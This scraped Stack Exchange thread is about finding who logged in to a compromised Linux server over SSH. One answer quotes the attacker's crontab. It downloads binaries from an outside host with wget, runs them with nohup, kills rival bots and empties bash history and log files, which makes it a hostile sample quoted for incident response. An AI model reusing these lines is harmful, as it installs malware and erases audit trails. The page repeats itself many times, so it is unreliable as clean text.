*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&

*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&

*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&

*/1 * * * * echo "unset MAILCHECK" >> /etc/profile

*/1 * * * * rm -rf /root/.bash_history

*/1 * * * * touch /root/.bash_history

*/1 * * * * history -r

*/1 * * * * cd /var/log > dmesg 

*/1 * * * * cd /var/log > auth.log 

*/1 * * * * cd /var/log > alternatives.log 

*/1 * * * * cd /var/log > boot.log 

*/1 * * * * cd /var/log > btmp 

*/1 * * * * cd /var/log > cron 

*/1 * * * * cd /var/log > cups 

*/1 * * * * cd /var/log > daemon.log 

*/1 * * * * cd /var/log > dpkg.log 

*/1 * * * * cd /var/log > faillog 

*/1 * * * * cd /var/log > kern.log 

*/1 * * * * cd /var/log > lastlog

*/1 * * * * cd /var/log > maillog 

*/1 * * * * cd /var/log > user.log 

*/1 * * * * cd /var/log > Xorg.x.log 

*/1 * * * * cd /var/log > anaconda.log 

*/1 * * * * cd /var/log > yum.log 

*/1 * * * * cd /var/log > secure

*/1 * * * * cd /var/log > wtmp

*/1 * * * * cd /var/log > utmp 

*/1 * * * * cd /var/log > messages

*/1 * * * * cd /var/log > spooler

*/1 * * * * cd /var/log > sudolog

*/1 * * * * cd /var/log > aculog

*/1 * * * * cd /var/log > access-log

*/1 * * * * cd /root > .bash_history

*/1 * * * * history -c

As you can see, all the log files are cleared, this is why I was not able to retrieve a lot of information.

edited Apr 6 at 0:52

community wiki

3 revs, 3 users 69%
Dominique

3

This is pretty scary stuff - any idea how they accessed your system? Was it simply a brute force hack against a weak password?

– user35581
Jun 17 '16 at 15:30

add a comment
|

I ran a traceroute on three of the addresses and two are from China and the other is from Pakistan; these are the IPs:

221.120.224.179

116.10.191.218

61.174.51.221

More info about the botnet that was injected into the server after it was compromised:

*/1 * * * * killall -9 .IptabLes

*/1 * * * * killall -9 nfsd4

*/1 * * * * killall -9 profild.key

*/1 * * * * killall -9 nfsd

*/1 * * * * killall -9 DDosl

*/1 * * * * killall -9 lengchao32

*/1 * * * * killall -9 b26

*/1 * * * * killall -9 codelove

*/1 * * * * killall -9 32

*/1 * * * * killall -9 64

*/1 * * * * killall -9 new6

*/1 * * * * killall -9 new4

*/1 * * * * killall -9 node24

*/1 * * * * killall -9 freeBSD

*/99 * * * * killall -9 kysapd

*/98 * * * * killall -9 atdd

*/97 * * * * killall -9 kysapd

*/96 * * * * killall -9 skysapd

*/95 * * * * killall -9 xfsdx

*/94 * * * * killall -9 ksapd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd

*/120 * * * * cd /root;rm -rf dir nohup.out

*/360 * * * * cd /etc;rm -rf dir atdd

*/360 * * * * cd /etc;rm -rf dir ksapd

*/360 * * * * cd /etc;rm -rf dir kysapd

*/360 * * * * cd /etc;rm -rf dir skysapd

*/360 * * * * cd /etc;rm -rf dir sksapd

*/360 * * * * cd /etc;rm -rf dir xfsdx

*/1 * * * * cd /etc;rm -rf dir cupsdd.*

*/1 * * * * cd /etc;rm -rf dir atdd.*

*/1 * * * * cd /etc;rm -rf dir ksapd.*

*/1 * * * * cd /etc;rm -rf dir kysapd.*

*/1 * * * * cd /etc;rm -rf dir skysapd.*

*/1 * * * * cd /etc;rm -rf dir sksapd.*

*/1 * * * * cd /etc;rm -rf dir xfsdx.*

*/1 * * * * chmod 7777 /etc/atdd

*/1 * * * * chmod 7777 /etc/cupsdd

*/1 * * * * chmod 7777 /etc/ksapd

*/1 * * * * chmod 7777 /etc/kysapd

*/1 * * * * chmod 7777 /etc/skysapd

*/1 * * * * chmod 7777 /etc/sksapd

*/1 * * * * chmod 7777 /etc/xfsdx

*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&

*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&

*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&

*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&

*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&

*/1 * * * * echo "unset MAILCHECK" >> /etc/profile

*/1 * * * * rm -rf /root/.bash_history

*/1 * * * * touch /root/.bash_history

*/1 * * * * history -r

*/1 * * * * cd /var/log > dmesg 

*/1 * * * * cd /var/log > auth.log 

*/1 * * * * cd /var/log > alternatives.log 

*/1 * * * * cd /var/log > boot.log 

*/1 * * * * cd /var/log > btmp 

*/1 * * * * cd /var/log > cron 

*/1 * * * * cd /var/log > cups 

*/1 * * * * cd /var/log > daemon.log 

*/1 * * * * cd /var/log > dpkg.log 

*/1 * * * * cd /var/log > faillog 

*/1 * * * * cd /var/log > kern.log 

*/1 * * * * cd /var/log > lastlog

*/1 * * * * cd /var/log > maillog 

*/1 * * * * cd /var/log > user.log 

*/1 * * * * cd /var/log > Xorg.x.log 

*/1 * * * * cd /var/log > anaconda.log 

*/1 * * * * cd /var/log > yum.log 

*/1 * * * * cd /var/log > secure

*/1 * * * * cd /var/log > wtmp

*/1 * * * * cd /var/log > utmp 

*/1 * * * * cd /var/log > messages

*/1 * * * * cd /var/log > spooler

*/1 * * * * cd /var/log > sudolog

*/1 * * * * cd /var/log > aculog

*/1 * * * * cd /var/log > access-log

*/1 * * * * cd /root > .bash_history

*/1 * * * * history -c

As you can see, all the log files are cleared, this is why I was not able to retrieve a lot of information.

edited Apr 6 at 0:52

community wiki

3 revs, 3 users 69%
Dominique

I ran a traceroute on three of the addresses and two are from China and the other is from Pakistan; these are the IPs:

221.120.224.179

116.10.191.218

61.174.51.221

More info about the botnet that was injected into the server after it was compromised:

*/1 * * * * killall -9 .IptabLes

*/1 * * * * killall -9 nfsd4

*/1 * * * * killall -9 profild.key

*/1 * * * * killall -9 nfsd

*/1 * * * * killall -9 DDosl

*/1 * * * * killall -9 lengchao32

*/1 * * * * killall -9 b26

*/1 * * * * killall -9 codelove

*/1 * * * * killall -9 32

*/1 * * * * killall -9 64

*/1 * * * * killall -9 new6

*/1 * * * * killall -9 new4

*/1 * * * * killall -9 node24

*/1 * * * * killall -9 freeBSD

*/99 * * * * killall -9 kysapd

*/98 * * * * killall -9 atdd

*/97 * * * * killall -9 kysapd

*/96 * * * * killall -9 skysapd

*/95 * * * * killall -9 xfsdx

*/94 * * * * killall -9 ksapd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd

*/120 * * * * cd /root;rm -rf dir nohup.out

*/360 * * * * cd /etc;rm -rf dir atdd

*/360 * * * * cd /etc;rm -rf dir ksapd

*/360 * * * * cd /etc;rm -rf dir kysapd

*/360 * * * * cd /etc;rm -rf dir skysapd

*/360 * * * * cd /etc;rm -rf dir sksapd

*/360 * * * * cd /etc;rm -rf dir xfsdx

*/1 * * * * cd /etc;rm -rf dir cupsdd.*

*/1 * * * * cd /etc;rm -rf dir atdd.*

*/1 * * * * cd /etc;rm -rf dir ksapd.*

*/1 * * * * cd /etc;rm -rf dir kysapd.*

*/1 * * * * cd /etc;rm -rf dir skysapd.*

*/1 * * * * cd /etc;rm -rf dir sksapd.*

*/1 * * * * cd /etc;rm -rf dir xfsdx.*

*/1 * * * * chmod 7777 /etc/atdd

*/1 * * * * chmod 7777 /etc/cupsdd

*/1 * * * * chmod 7777 /etc/ksapd

*/1 * * * * chmod 7777 /etc/kysapd

*/1 * * * * chmod 7777 /etc/skysapd

*/1 * * * * chmod 7777 /etc/sksapd

*/1 * * * * chmod 7777 /etc/xfsdx

*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&

*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&

*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&

*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&

*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&

*/1 * * * * echo "unset MAILCHECK" >> /etc/profile

*/1 * * * * rm -rf /root/.bash_history

*/1 * * * * touch /root/.bash_history

*/1 * * * * history -r

*/1 * * * * cd /var/log > dmesg 

*/1 * * * * cd /var/log > auth.log 

*/1 * * * * cd /var/log > alternatives.log 

*/1 * * * * cd /var/log > boot.log 

*/1 * * * * cd /var/log > btmp 

*/1 * * * * cd /var/log > cron 

*/1 * * * * cd /var/log > cups 

*/1 * * * * cd /var/log > daemon.log 

*/1 * * * * cd /var/log > dpkg.log 

*/1 * * * * cd /var/log > faillog 

*/1 * * * * cd /var/log > kern.log 

*/1 * * * * cd /var/log > lastlog

*/1 * * * * cd /var/log > maillog 

*/1 * * * * cd /var/log > user.log 

*/1 * * * * cd /var/log > Xorg.x.log 

*/1 * * * * cd /var/log > anaconda.log 

*/1 * * * * cd /var/log > yum.log 

*/1 * * * * cd /var/log > secure

*/1 * * * * cd /var/log > wtmp

*/1 * * * * cd /var/log > utmp 

*/1 * * * * cd /var/log > messages

*/1 * * * * cd /var/log > spooler

*/1 * * * * cd /var/log > sudolog

*/1 * * * * cd /var/log > aculog

*/1 * * * * cd /var/log > access-log

*/1 * * * * cd /root > .bash_history

*/1 * * * * history -c

As you can see, all the log files are cleared, this is why I was not able to retrieve a lot of information.

edited Apr 6 at 0:52

community wiki

3 revs, 3 users 69%
Dominique

edited Apr 6 at 0:52

community wiki

3 revs, 3 users 69%
Dominique

community wiki

3 revs, 3 users 69%
Dominique

community wiki

3 revs, 3 users 69%
Dominique

3

This is pretty scary stuff - any idea how they accessed your system? Was it simply a brute force hack against a weak password?

– user35581
Jun 17 '16 at 15:30

add a comment
|

3

This is pretty scary stuff - any idea how they accessed your system? Was it simply a brute force hack against a weak password?

– user35581
Jun 17 '16 at 15:30

This is pretty scary stuff - any idea how they accessed your system? Was it simply a brute force hack against a weak password?

– user35581
Jun 17 '16 at 15:30

add a comment
|

From this answer, I see the below information.

Talking about SSH servers, I will give you command line solutions.

Track user logins and logouts. That's easy, the file /var/log/auth.log should have this information.

Prevent users from deleting logs: Users shouldn't be able to touch auth.log. In order to stop them from playing with bash_history you need to do a couple of tricks.

What if the user manages to obtain root access? : You're screwed. Unless he makes a mistake he will be able to hide all his footsteps.

Also, from this answer, we can see the IP address of a client using the SSH_CLIENT variable.

Also from this answer, I see that ssh history could be stored in these files.

edited May 23 '17 at 12:39

Community♦

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

add a comment
|

From this answer, I see the below information.

Talking about SSH servers, I will give you command line solutions.

Track user logins and logouts. That's easy, the file /var/log/auth.log should have this information.

Prevent users from deleting logs: Users shouldn't be able to touch auth.log. In order to stop them from playing with bash_history you need to do a couple of tricks.

What if the user manages to obtain root access? : You're screwed. Unless he makes a mistake he will be able to hide all his footsteps.

Also, from this answer, we can see the IP address of a client using the SSH_CLIENT variable.

Also from this answer, I see that ssh history could be stored in these files.

edited May 23 '17 at 12:39

Community♦

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

add a comment
|

From this answer, I see the below information.

Talking about SSH servers, I will give you command line solutions.

Track user logins and logouts. That's easy, the file /var/log/auth.log should have this information.

Prevent users from deleting logs: Users shouldn't be able to touch auth.log. In order to stop them from playing with bash_history you need to do a couple of tricks.

What if the user manages to obtain root access? : You're screwed. Unless he makes a mistake he will be able to hide all his footsteps.

Also, from this answer, we can see the IP address of a client using the SSH_CLIENT variable.

Also from this answer, I see that ssh history could be stored in these files.

edited May 23 '17 at 12:39

Community♦

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

From this answer, I see the below information.

Talking about SSH servers, I will give you command line solutions.

Track user logins and logouts. That's easy, the file /var/log/auth.log should have this information.

Prevent users from deleting logs: Users shouldn't be able to touch auth.log. In order to stop them from playing with bash_history you need to do a couple of tricks.

What if the user manages to obtain root access? : You're screwed. Unless he makes a mistake he will be able to hide all his footsteps.

Also, from this answer, we can see the IP address of a client using the SSH_CLIENT variable.

Also from this answer, I see that ssh history could be stored in these files.

edited May 23 '17 at 12:39

Community♦

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

edited May 23 '17 at 12:39

Community♦

edited May 23 '17 at 12:39

Community♦

edited May 23 '17 at 12:39

Community♦

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

add a comment
|

Simplest command to get the last 10 users logged in to the machine is last|head.

To get all the users simply use last command

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

add a comment
|

Simplest command to get the last 10 users logged in to the machine is last|head.

To get all the users simply use last command

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

add a comment
|

Simplest command to get the last 10 users logged in to the machine is last|head.

To get all the users simply use last command

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

Simplest command to get the last 10 users logged in to the machine is last|head.

To get all the users simply use last command

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

add a comment
|

This machine has been compromised. This means any data on it, historical or current, can no longer be trusted.

In short, the answer is no. You cannot be sure you have found the originating address from any log file recorded on this machine.

Wipe and reinstall. And patch.

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

add a comment
|

This machine has been compromised. This means any data on it, historical or current, can no longer be trusted.

In short, the answer is no. You cannot be sure you have found the originating address from any log file recorded on this machine.

Wipe and reinstall. And patch.

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

add a comment
|

This machine has been compromised. This means any data on it, historical or current, can no longer be trusted.

In short, the answer is no. You cannot be sure you have found the originating address from any log file recorded on this machine.

Wipe and reinstall. And patch.

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

This machine has been compromised. This means any data on it, historical or current, can no longer be trusted.

In short, the answer is no. You cannot be sure you have found the originating address from any log file recorded on this machine.

Wipe and reinstall. And patch.

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

add a comment
|

To see only successful login attempts with password:

zgrep sshd /var/log/auth.log* -h |grep -F 'Accepted password for'

edited Apr 30 at 4:20

answered Apr 30 at 3:59

Vini

1114 bronze badges

add a comment
|

To see only successful login attempts with password:

zgrep sshd /var/log/auth.log* -h |grep -F 'Accepted password for'

edited Apr 30 at 4:20

answered Apr 30 at 3:59

Vini

1114 bronze badges

add a comment
|

To see only successful login attempts with password:

zgrep sshd /var/log/auth.log* -h |grep -F 'Accepted password for'

edited Apr 30 at 4:20

answered Apr 30 at 3:59

Vini

1114 bronze badges

To see only successful login attempts with password:

zgrep sshd /var/log/auth.log* -h |grep -F 'Accepted password for'

edited Apr 30 at 4:20

answered Apr 30 at 3:59

Vini

1114 bronze badges

edited Apr 30 at 4:20

answered Apr 30 at 3:59

Vini

1114 bronze badges

answered Apr 30 at 3:59

Vini

1114 bronze badges

answered Apr 30 at 3:59

Vini

1114 bronze badges

add a comment
|

for debian the test search is worded slightly different

zgrep sshd /var/log/auth.log* -h |grep -F 'session opened for user'

answered 4 hours ago

CRTLBREAK

392 bronze badges

add a comment
|

for debian the test search is worded slightly different

zgrep sshd /var/log/auth.log* -h |grep -F 'session opened for user'

answered 4 hours ago

CRTLBREAK

392 bronze badges

add a comment
|

for debian the test search is worded slightly different

zgrep sshd /var/log/auth.log* -h |grep -F 'session opened for user'

answered 4 hours ago

CRTLBREAK

392 bronze badges

for debian the test search is worded slightly different

zgrep sshd /var/log/auth.log* -h |grep -F 'session opened for user'

answered 4 hours ago

CRTLBREAK

392 bronze badges

answered 4 hours ago

CRTLBREAK

392 bronze badges

answered 4 hours ago

CRTLBREAK

392 bronze badges

answered 4 hours ago

CRTLBREAK

392 bronze badges

add a comment
|

draft saved

draft discarded

Thanks for contributing an answer to Unix & Linux Stack Exchange!

Please be sure to answer the question. Provide details and share your research!

But avoid …

Asking for help, clarification, or responding to other answers.

Making statements based on opinion; back them up with references or personal experience.

To learn more, see our tips on writing great answers.

draft saved

draft discarded

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Post as a guest

Name

Required, but never shown

Post as a guest

Name

Required, but never shown

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Post as a guest

Name

Required, but never shown

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Post as a guest

Name

Required, but never shown

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Post as a guest

Name

Required, but never shown

Name

Required, but never shown

Name

Required, but never shown

This page is only for reference, If you need detailed information, please check here

搜尋此網誌

Mdthbs